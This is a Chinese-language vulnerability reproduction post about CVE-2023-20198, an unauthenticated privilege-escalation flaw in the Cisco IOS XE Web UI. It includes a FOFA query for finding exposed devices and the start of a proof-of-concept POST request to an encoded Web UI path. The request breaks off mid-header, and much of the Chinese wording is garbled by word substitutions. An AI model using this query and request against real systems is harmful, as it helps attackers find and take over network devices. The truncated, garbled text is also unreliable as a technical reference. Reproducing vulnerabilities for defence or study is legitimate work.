Cisco IOS XE Web UI 权限提升毛病复现(CVE-2023-20198)

0x01 产品简介

Web UI 是一种基于GUI的嵌入式体系管理工具，可以或许提供体系设置、简化体系摆设和可管理性以及加强用户体验。它带有默认映像，因此无需在体系上启用任何内容或安装任何许可证。Web UI 可用于构建设置以及监控体系和排除体系故障，而无需CLI专业知识。
0x02 毛病概述

当Cisco IOS XE 软件的web UI袒露于互联网或不受信托的网络时，未经身份验证的远程攻击者可以利用该毛病在受影响的体系上创建具有15级访问权限的帐户。攻击者可以利用该帐户来控制受影响的体系。
利用条件：需要启用HTTP Server大概HTTPS Server。
0x03 影响范围

启用了Web UI 功能的Cisco IOS XE
0x04 复现情况

FOFA：

1. body="<script>window.onload=function(){ url ='/webui';window.location.href=url;}</script>"

复制代码

0x05 毛病复现

PoC

1. POST /%2577eb%2575i_%2577sma_Http HTTP/1.1
2. Host: your-ip
3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
4. Content-Type: application/x-www-form-urlencod

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。